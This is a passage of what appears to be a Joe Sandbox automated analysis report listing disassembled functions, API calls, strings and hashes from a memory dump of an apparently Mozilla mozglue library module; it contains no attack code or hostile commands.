Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C274A68), ref: 6C2A945E
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2A9470
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2A9482
Part of subcall function 6C2A9420: __Init_thread_footer.LIBCMT ref: 6C2A949F

GetCurrentThreadId.KERNEL32 ref: 6C2AE12F
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6C2AE084,00000000), ref: 6C2AE137

Part of subcall function 6C2A94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2A94EE
Part of subcall function 6C2A94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2A9508

?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6C2AE196
?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6C2AE1E9

Part of subcall function 6C2A99A0: GetCurrentThreadId.KERNEL32 ref: 6C2A99C1
Part of subcall function 6C2A99A0: AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2A99CE
Part of subcall function 6C2A99A0: ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2A99F8

Strings

[I %d/%d] WriteProfileToJSONWriter, xrefs: 6C2AE13F

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] WriteProfileToJSONWriter
API String ID: 2491745604-3904374701
Opcode ID: b98bca9bc706ff7430a68175884f22d971dc3e957117669a6ea640c7963cdb06
Instruction ID: b145ef2e30495eb457a0078210a424383db20aee76e5e18ee70e88d5b6974bae
Opcode Fuzzy Hash: b98bca9bc706ff7430a68175884f22d971dc3e957117669a6ea640c7963cdb06
Instruction Fuzzy Hash: E4312AB160470D9FD300DF5984453AAF7E5AFDA308F14842DEC955BB81DB71990ACBA2

Function 6C29F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C29F480

Part of subcall function 6C26F100: LoadLibraryW.KERNEL32(shell32,?,6C2DD020), ref: 6C26F122
Part of subcall function 6C26F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C26F132

CloseHandle.KERNEL32(00000000), ref: 6C29F555

Part of subcall function 6C2714B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C271248,6C271248,?), ref: 6C2714C9
Part of subcall function 6C2714B0: memcpy.VCRUNTIME140(?,6C271248,00000000,?,6C271248,?), ref: 6C2714EF

Part of subcall function 6C26EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C26EEE3

CreateFileW.KERNEL32 ref: 6C29F4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C29F523

Strings

\oleacc.dll, xrefs: 6C29F4CB

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: 68abc868a3f3f566930d971dbda0a47b172e5090ab1e465ead5747b014cce803
Instruction ID: ecf43660704c07f6219d059ec4f57932fd6ff9a4dc657bf7b6b3d3aa12fb90f1
Opcode Fuzzy Hash: 68abc868a3f3f566930d971dbda0a47b172e5090ab1e465ead5747b014cce803
Instruction Fuzzy Hash: C241E7306087159FD760DF29C884B9BB3F4AF44319F504A1CFD9493650EB70D989CBA2

Function 6C2AE020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C274A68), ref: 6C2A945E
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2A9470
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2A9482
Part of subcall function 6C2A9420: __Init_thread_footer.LIBCMT ref: 6C2A949F

GetCurrentThreadId.KERNEL32 ref: 6C2AE047
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2AE04F

Part of subcall function 6C2A94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2A94EE
Part of subcall function 6C2A94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2A9508

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2AE09C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2AE0B0

Strings

[I %d/%d] profiler_get_profile, xrefs: 6C2AE057

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] profiler_get_profile
API String ID: 1832963901-4276087706
Opcode ID: 1727392322a7ebf7093cc97729ed0ec9d0dba72d51798f104cb6e090a8a7614b
Instruction ID: 66fcf6b78101d3e7183e874a4dda9aae5d7927049ec22c28c5b3d70bb49c83a8
Opcode Fuzzy Hash: 1727392322a7ebf7093cc97729ed0ec9d0dba72d51798f104cb6e090a8a7614b
Instruction Fuzzy Hash: 3121B374A0021D9FDF00DFA5D858AAEBBB5AF49309F140414ED16A7780DF31991BC791

Function 6C2C74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C2C7526
__Init_thread_footer.LIBCMT ref: 6C2C7566
__Init_thread_footer.LIBCMT ref: 6C2C7597

Strings

UnmapViewOfFile2, xrefs: 6C2C7552
kernel32.dll, xrefs: 6C2C7557

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 0cb7a7df00b2dbf181557103222df0ca3e39afeeba7d65a745f41edd28961f69
Instruction ID: a658b004807f1c5722ca3e1bb274056726d8af42f1d44048eca6a63fa5ec18e2
Opcode Fuzzy Hash: 0cb7a7df00b2dbf181557103222df0ca3e39afeeba7d65a745f41edd28961f69
Instruction Fuzzy Hash: 08212831B0150997DB548BEAE818E9A3375EB4BB65F004228EC0967B80CB30A841C597

Function 6C2C7930 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C27BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C2C7A3F), ref: 6C27BF11
Part of subcall function 6C27BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C2C7A3F), ref: 6C27BF5D
Part of subcall function 6C27BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C2C7A3F), ref: 6C27BF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6C2C7968
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6C2CA264,6C2CA264), ref: 6C2C799A

Part of subcall function 6C279830: free.MOZGLUE(?,?,?,6C2C7ABE), ref: 6C27985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C2C79E0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C2C79E8

Strings

-l, xrefs: 6C2C79D0

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID: -l
API String ID: 3421697164-4032016520
Opcode ID: 13b98ed240f6daa741e5fd92e5871e72238b42ca01441341cbc324af6bbf02c2
Instruction ID: cd34188c31ccb6997b141c2780e98de1c4bdaa44efdabeee660ee1ef663d57a0
Opcode Fuzzy Hash: 13b98ed240f6daa741e5fd92e5871e72238b42ca01441341cbc324af6bbf02c2
Instruction Fuzzy Hash: 67215C356043089FCB14DF18D889A9EFBB5EF89314F04882DEC4A97391CB30A909CB92

Function 6C2CA7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C2EF770,-00000001,?,6C2DE330,?,6C28BDF7), ref: 6C2CA7AF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C28BDF7), ref: 6C2CA7C2
moz_xmalloc.MOZGLUE(00000018,?,6C28BDF7), ref: 6C2CA7E4
LeaveCriticalSection.KERNEL32(6C2EF770), ref: 6C2CA80A

Strings

accelerator.dll, xrefs: 6C2CA7BF

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
String ID: accelerator.dll
API String ID: 2442272132-2426294810
Opcode ID: 2fc8bd41bb7124f4cdf842792fc552f2fe05e6a48995c43c3e1c8ba9985c2022
Instruction ID: 36aab05b71da1b7a53bcb77153e6fe27985ee6ce2dfd2bc1db1a4a29d51c46f2
Opcode Fuzzy Hash: 2fc8bd41bb7124f4cdf842792fc552f2fe05e6a48995c43c3e1c8ba9985c2022
Instruction Fuzzy Hash: C9018F70710308DFDB84CF56E8C8C2677B8FB8D316B05816AEC099B781DB70A804CBA1

Function 6C26F0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ole32,?,6C26EE51,?), ref: 6C26F0B2
GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C26F0C2

Strings

Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C26F0DC
ole32, xrefs: 6C26F0AD
Could not find CoTaskMemFree, xrefs: 6C26F0E3

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
API String ID: 2574300362-1578401391
Opcode ID: f662aa6da36bf1bb532aeb29aa40257a0c0a57bc1d89ef95ce927141ed744612
Instruction ID: 794df0414ed28aedc3463b9d06d29ebecf28539b8fb5bad8627140db6409121e
Opcode Fuzzy Hash: f662aa6da36bf1bb532aeb29aa40257a0c0a57bc1d89ef95ce927141ed744612
Instruction Fuzzy Hash: 8EE0927134430E9B9F541B676C1DB2737B85B1E20A3444139BD11F1E85EE21D040C666

Function 6C2A0080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C277204), ref: 6C2A0088
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C2A00A7
FreeLibrary.KERNEL32(?,6C277204), ref: 6C2A00BE

Strings

wintrust.dll, xrefs: 6C2A0083
CryptCATAdminAcquireContext2, xrefs: 6C2A00A1

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext2$wintrust.dll
API String ID: 145871493-3385133079
Opcode ID: c3fb9533f8e3a6eef26c66f624c0ac17b4976e7b670eb921be1a5ca4743e538f
Instruction ID: ae69491377b8df590ede9032bb34afa722abad0973bb7751d0e5009064f62ade
Opcode Fuzzy Hash: c3fb9533f8e3a6eef26c66f624c0ac17b4976e7b670eb921be1a5ca4743e538f
Instruction Fuzzy Hash: C6E092746403499BEF90EFB6A80C7067AF8AB0F345F944426AE15E26D1EBB4C040DB15

Function 6C2A00D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C277235), ref: 6C2A00D8
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C2A00F7
FreeLibrary.KERNEL32(?,6C277235), ref: 6C2A010E

Strings

CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C2A00F1
wintrust.dll, xrefs: 6C2A00D3

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
API String ID: 145871493-2559046807
Opcode ID: b47d5c2d7ad4a14c8fc9e6835dd9b88e50113d40e537b09e9f88cb515d4a1002
Instruction ID: 3bc6c6406d068996488dcc0c661972e96dea5e7a985f5783356debbedde198d9
Opcode Fuzzy Hash: b47d5c2d7ad4a14c8fc9e6835dd9b88e50113d40e537b09e9f88cb515d4a1002
Instruction Fuzzy Hash: 95E0B67464534A9BEF80DFA9E90EB627AF9E70F345F949025AD4EB1AD0DBB0C040CB14

Function 6C2A0120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C277297), ref: 6C2A0128
GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6C2A0147
FreeLibrary.KERNEL32(?,6C277297), ref: 6C2A015E

Strings

CryptCATAdminEnumCatalogFromHash, xrefs: 6C2A0141
wintrust.dll, xrefs: 6C2A0123

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
API String ID: 145871493-1536241729
Opcode ID: e0692ae5da7d825a4d4c582e062459707ab0aecaf7581677b466322ee3a4bcb9
Instruction ID: 6eaf2be0fa54638adf3605b793b09d7b97855540fcc4f0fda908471b28d4296f
Opcode Fuzzy Hash: e0692ae5da7d825a4d4c582e062459707ab0aecaf7581677b466322ee3a4bcb9
Instruction Fuzzy Hash: A2E07E786457899BEF90ABAAA81C75A7AF8E70F345F904025AE06E6690DBB0D001CB54

Function 6C2A0170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C277308), ref: 6C2A0178
GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6C2A0197
FreeLibrary.KERNEL32(?,6C277308), ref: 6C2A01AE

Strings

CryptCATCatalogInfoFromContext, xrefs: 6C2A0191
wintrust.dll, xrefs: 6C2A0173

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATCatalogInfoFromContext$wintrust.dll
API String ID: 145871493-3354427110
Opcode ID: 30bcff17d114db857e0f440ecb4b55acca065b7aedf5896e71870f08b8b57085
Instruction ID: 4b17ec3ace08c11338bc61d4b7118522da09c86b92fb78bb4af268492071b9b7
Opcode Fuzzy Hash: 30bcff17d114db857e0f440ecb4b55acca065b7aedf5896e71870f08b8b57085
Instruction Fuzzy Hash: 21E09A746823099BEF809FAAD90DB827BF8B70E345F944056ED86A27D0D7748040CA26

Function 6C2CC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C2CC0E9), ref: 6C2CC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C2CC437
FreeLibrary.KERNEL32(?,6C2CC0E9), ref: 6C2CC44C

Strings

NtQueryVirtualMemory, xrefs: 6C2CC431
ntdll.dll, xrefs: 6C2CC413

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: 9f30eb9c40dc08e9c9201c4c847c097c3474f388152534118ed4ba87aac7510f
Instruction ID: 6d58d5969ce70d89826e0564a9dfbda79ea095c2323641c8021b80db10afb92a
Opcode Fuzzy Hash: 9f30eb9c40dc08e9c9201c4c847c097c3474f388152534118ed4ba87aac7510f
Instruction Fuzzy Hash: 48E09270A013099BDB90AB71A91C7127AF8A74E605F489226AE04F16D1EBB4D400CA55

Function 6C2C75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C2C748B,?), ref: 6C2C75B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C2C75D7
FreeLibrary.KERNEL32(?,6C2C748B,?), ref: 6C2C75EC

Strings

ntdll.dll, xrefs: 6C2C75B3
RtlNtStatusToDosError, xrefs: 6C2C75D1

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 25ed8cf3cebb8ff05201c66eb2238431c02f68636acf690e51f353f28fdaa8e4
Instruction ID: ad77cc824ea190b37446bba993e2bc49fa9782ddf835773ed396c31b7fdd810d
Opcode Fuzzy Hash: 25ed8cf3cebb8ff05201c66eb2238431c02f68636acf690e51f353f28fdaa8e4
Instruction Fuzzy Hash: D4E0BF71741306ABDF805FA7D84C7067AF8E70E255F544025AD05F5691DB718541CF15

Function 6C2C7600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C2C7592), ref: 6C2C7608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C2C7627
FreeLibrary.KERNEL32(?,6C2C7592), ref: 6C2C763C

Strings

ntdll.dll, xrefs: 6C2C7603
NtUnmapViewOfSection, xrefs: 6C2C7621

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: 170b9203c8cc1d0c78a5ea18560ec8116b7a88339aa0d50ca13e4e554fa89f52
Instruction ID: c4acda8c8cea86aa12871e55c5772a9acbc283d55ed986bbfca500190c228e28
Opcode Fuzzy Hash: 170b9203c8cc1d0c78a5ea18560ec8116b7a88339aa0d50ca13e4e554fa89f52
Instruction Fuzzy Hash: AAE092B1641309ABEF80ABA6A84C7027AB8E75E359F944125FD09F1695EBB08400CB19

Function 6C2CBE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6C2CBE49), ref: 6C2CBEC4
RtlCaptureStackBackTrace.NTDLL ref: 6C2CBEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C2CBE49), ref: 6C2CBF38
RtlReAllocateHeap.NTDLL ref: 6C2CBF83
RtlFreeHeap.NTDLL(6C2CBE49,00000000), ref: 6C2CBFA6

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: 043b335ccc0c29cee0b0370822b89f6d1be607d88ab4fd7875dd365fcf8d6506
